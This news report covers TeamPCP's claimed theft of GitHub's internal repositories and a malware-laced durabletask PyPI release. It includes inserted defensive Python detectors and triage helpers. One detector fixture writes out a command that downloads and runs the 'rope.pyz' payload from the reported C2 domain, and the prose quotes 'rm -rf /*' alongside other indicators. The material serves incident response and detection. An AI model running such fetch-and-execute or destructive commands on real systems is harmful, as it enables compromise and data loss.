GitHub Investigating TeamPCP Claimed Breach of ~4,000 Internal Repositories

By Ravie Lakshmanan, The Hacker News
May 20, 2026 | Malware / Cloud Security

GitHub on Tuesday said it’s investigating unauthorized access to its internal repositories after the notorious threat actor known as TeamPCP listed the platform’s source code and internal organizations for sale on a cybercrime forum.

“While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity,” the Microsoft-owned subsidiary said.

The company also noted that it will notify customers via established incident response and notification channels if any impact is discovered.

The development comes after TeamPCP, a threat actor behind a string of software supply chain attacks targeting open-source packages, listed GitHub’s source code for sale for an asking price of no less than $50,000. The alleged data dump is said to include about 4,000 repositories.

“As always, this is not a ransom,” the group said in a post, according to screenshots shared by Dark Web Informer. “We do not care about extorting GitHub, 1 buyer and we shred the data on our end, it looks like our retirement is soon so if no buyer is found, we leak it for free.”

TeamPCP Compromises durabletask PyPI Package

News of the sale comes as TeamPCP’s self-replicating malware campaign, known as Mini Shai-Hulud, continues to expand in reach with the compromise of durabletask, an official Microsoft Python client for the Durable Task workflow execution framework. Three malicious package versions have been identified: 1.4.1, 1.4.2, and 1.4.3.

“The attacker compromised a GitHub account via a previous attack, dumped GitHub secrets from a repository to which the user had access, and from there had access to the PyPI token to publish directly,” Google-owned Wiz said.

The payload embedded into the package is a dropper, which is configured to fetch and run a second-stage payload (“rope.pyz”) from an external server (“check.git-service[.]com”). The malware is assessed to be an evolution of the payload deployed in connection with the compromise of the guardrails-ai package last week.

Specifically, it’s designed to activate a full-featured infostealer that’s capable of harvesting credentials associated with major cloud providers, password managers, and developer tools, and exfiltrating the data to the attacker-controlled domain. It’s worth noting that the stealer is configured to execute only on Linux systems.

According to SafeDep, the 28KB Python stealer also attempts to read HashiCorp Vault KV secrets, unlock and dump 1Password and Bitwarden password vaults, and access SSH keys, Docker credentials, VPN configurations, and shell history.

“If the machine is running inside AWS, it propagates itself to other EC2 instances using SSM. If it’s inside Kubernetes, it propagates through kubectl exec,” Aikido Security said. “And if it detects Israeli or Iranian system settings, there’s a 1-in-6 chance it plays audio and then runs rm -rf /*.”

“After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile,” per StepSecurity. “The propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com, and runs it in the background.”
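The SSM propagation described above leaves a trail in CloudTrail: `ssm:SendCommand` calls using the `AWS-RunShellScript` document. The following is an added example, not code from the article, StepSecurity or Aikido, showing how a defender could flag such calls in a batch of CloudTrail records: events whose shell lines contain an indicator the article names, and principals whose `SendCommand` calls reach five or more distinct instances (the per-profile fan-out the article reports). The records are constructed; field names follow CloudTrail's schema, but the exact nesting under `requestParameters` is an assumption to check against real logs.

```python
"""Detector for SSM-based worm propagation over CloudTrail-style records.
Added example; sample records below are constructed, not real log data."""
from collections import defaultdict

# Indicators taken from the article, kept defanged as reported there.
IOC_DEFANGED = ("check.git-service[.]com", "t.m-kosche[.]com", "rope.pyz")
IOC_SUBSTRINGS = tuple(ioc.replace("[.]", ".").lower() for ioc in IOC_DEFANGED)
FANOUT_THRESHOLD = 5  # the article reports up to 5 targets per profile


def _is_runshell_sendcommand(event):
    params = event.get("requestParameters") or {}
    return (event.get("eventSource") == "ssm.amazonaws.com"
            and event.get("eventName") == "SendCommand"
            and params.get("documentName") == "AWS-RunShellScript")


def _principal(event):
    return (event.get("userIdentity") or {}).get("arn", "unknown")


def _command_text(event):
    """Join the shell lines handed to AWS-RunShellScript (assumed layout)."""
    params = event.get("requestParameters") or {}
    return "\n".join((params.get("parameters") or {}).get("commands") or []).lower()


def classify_event(event):
    """Reasons a single event matches the campaign's indicators (may be empty)."""
    if not _is_runshell_sendcommand(event):
        return []
    text = _command_text(event)
    return [f"ioc:{ioc}" for ioc in IOC_SUBSTRINGS if ioc in text]


def detect(events):
    """Return {eventID: [reasons]} for flagged events, combining per-event
    indicator matches with per-principal fan-out counted over the batch."""
    ssm_events = [ev for ev in events if _is_runshell_sendcommand(ev)]
    targets = defaultdict(set)
    for ev in ssm_events:
        ids = (ev.get("requestParameters") or {}).get("instanceIds") or []
        targets[_principal(ev)].update(ids)
    flagged = {}
    for ev in ssm_events:
        reasons = classify_event(ev)
        reach = len(targets[_principal(ev)])
        if reach >= FANOUT_THRESHOLD:
            reasons.append(f"fanout:{reach}")
        if reasons:
            flagged[ev["eventID"]] = reasons
    return flagged


# Constructed sample records: one routine patch run, one payload fetch using
# the article's indicators, one wide fan-out from the same CI credential.
SAMPLE_EVENTS = [
    {"eventID": "evt-1", "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/OpsRole/alice"},
     "requestParameters": {"documentName": "AWS-RunShellScript", "instanceIds": ["i-0aaa"],
                           "parameters": {"commands": ["yum update -y"]}}},
    {"eventID": "evt-2", "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ci-deploy"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": ["i-0bbb", "i-0ccc"],
                           "parameters": {"commands": [
                               "curl -s https://check.git-service.com/rope.pyz -o /tmp/rope.pyz",
                               "python3 /tmp/rope.pyz &"]}}},
    {"eventID": "evt-3", "eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ci-deploy"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": ["i-0ddd", "i-0eee", "i-0fff", "i-0ggg", "i-0hhh"],
                           "parameters": {"commands": ["echo health-check"]}}},
]

if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(reasons))
```

The fan-out rule is deliberately counted per principal across the whole batch rather than per event, because the article describes propagation in batches of up to five instances per profile, so a single event may look unremarkable on its own.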

Also notable is the use of the FIRESCALE mechanism to identify a backup command-and-control (C2) address in the event the primary domain is unreachable. It does this by searching GitHub’s public commit messages for the pattern “FIRESCALE <base64_url>.<base64_signature>” and extracting the C2 information from it. Details of this technique were previously highlighted by Hunt.io.
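Because the FIRESCALE dead drop lives in public commit messages, a responder can scan commit history for the marker and decode the URL half to learn which fallback C2 a sample would use. The following is an added example, not Hunt.io's or the article's code. It assumes both halves are base64 or base64url with padding possibly stripped, and treats the signature as opaque: the article gives no verification key, so the signature is recorded but not checked. The commit messages and the C2 URL below are constructed placeholders, not real indicators.

```python
"""Scan commit messages for "FIRESCALE <base64_url>.<base64_signature>" markers.
Added example; sample messages are constructed."""
import base64
import binascii
import re

# Marker format as described in the article; charset covers base64 and base64url.
FIRESCALE_RE = re.compile(r"\bFIRESCALE\s+([A-Za-z0-9_+/=-]+)\.([A-Za-z0-9_+/=-]+)")


def decode_b64_lenient(token):
    """Decode base64 or base64url, padded or not; return None if invalid."""
    normalized = token.replace("-", "+").replace("_", "/").rstrip("=")
    normalized += "=" * (-len(normalized) % 4)
    try:
        return base64.b64decode(normalized, validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_commit_messages(messages):
    """Return one record per marker: message index, decoded URL (None when the
    URL half is not valid base64/UTF-8) and the raw, unverified signature."""
    hits = []
    for idx, msg in enumerate(messages):
        for m in FIRESCALE_RE.finditer(msg):
            raw = decode_b64_lenient(m.group(1))
            url = None
            if raw is not None:
                try:
                    url = raw.decode("utf-8")
                except UnicodeDecodeError:
                    url = None
            hits.append({"index": idx, "url": url, "signature": m.group(2)})
    return hits


# Constructed fixtures: a placeholder C2 (not a real indicator) encoded the way
# the article describes, plus one malformed marker that must not decode.
PLACEHOLDER_C2 = "https://c2.example.invalid/"
SAMPLE_MESSAGES = [
    "docs: fix typo in README",
    "chore: bump deps\n\nFIRESCALE "
    + base64.urlsafe_b64encode(PLACEHOLDER_C2.encode()).rstrip(b"=").decode()
    + ".sig-placeholder",
    "ci: retry flaky job FIRESCALE a.b",
]

if __name__ == "__main__":
    for hit in scan_commit_messages(SAMPLE_MESSAGES):
        print(hit)
```

In practice the scan would be fed commit messages pulled from the repositories a pipeline trusts, and any hit, decodable or not, is worth an alert: legitimate commit messages have no reason to carry this token.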

Because the worm propagates using tokens stolen from infected environments, the number of affected packages is expected to grow. Any machine or pipeline that installed an affected version of the package should be treated as fully compromised.
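Triage starts with finding out which machines and pipelines pulled one of the three listed versions. The following is an added example, not from the article or any vendor, of a small helper that reads `pip freeze` output or `requirements.txt` lines and separates entries that pin an affected durabletask version from entries that reference the package without an exact pin (where the installed version must be checked directly). The affected-version list comes from the article; the sample lines are constructed.

```python
"""Triage pip freeze / requirements lines against the affected durabletask
versions named in the article. Added example; sample input is constructed."""
import re

# Versions the article lists as malicious, keyed by PEP 503 normalized name.
AFFECTED = {"durabletask": {"1.4.1", "1.4.2", "1.4.3"}}

# name[extras] <op> version ; markers  # comment   (loose requirements parser)
REQ_RE = re.compile(
    r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?\s*"
    r"(===|==|~=|>=|<=|!=|>|<)?\s*([^\s;#]*)"
)


def normalize_name(name):
    """PEP 503 normalization: case-fold and collapse runs of -, _ and . to -."""
    return re.sub(r"[-_.]+", "-", name).lower()


def triage_requirements(lines):
    """Return (compromised, unpinned): lines pinning an affected version, and
    lines naming an affected package without an exact '==' pin."""
    compromised, unpinned = [], []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith(("#", "-")):
            continue  # comments and pip options such as -r / --index-url
        m = REQ_RE.match(line)
        if not m:
            continue
        name, op, ver = normalize_name(m.group(1)), m.group(2), m.group(3)
        if name not in AFFECTED:
            continue
        if op == "==" and ver in AFFECTED[name]:
            compromised.append(raw)
        elif op != "==":
            unpinned.append(raw)
    return compromised, unpinned


# Constructed sample, mixing unaffected packages, an affected pin, a safe pin
# and two unpinned references.
SAMPLE_LINES = [
    "# constructed sample requirements",
    "requests==2.32.3",
    "durabletask==1.4.2",
    "DurableTask == 1.4.0",
    "durabletask>=1.3",
    "durabletask",
    "azure-functions-durable==1.2.0",
]

if __name__ == "__main__":
    bad, check = triage_requirements(SAMPLE_LINES)
    print("compromised:", bad)
    print("verify installed version:", check)
```

A lockfile pin of an unaffected version is not by itself proof of safety: the article notes the malicious code runs on import, so what matters is the version actually installed in each environment, which `pip freeze` reflects and a loose requirements file does not.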

“The package is downloaded roughly 417,000 times a month, and the malicious code runs automatically the moment the package is imported, with no error messages and no visible signs of compromise,” Endor Labs researcher Peyton Kennedy said.
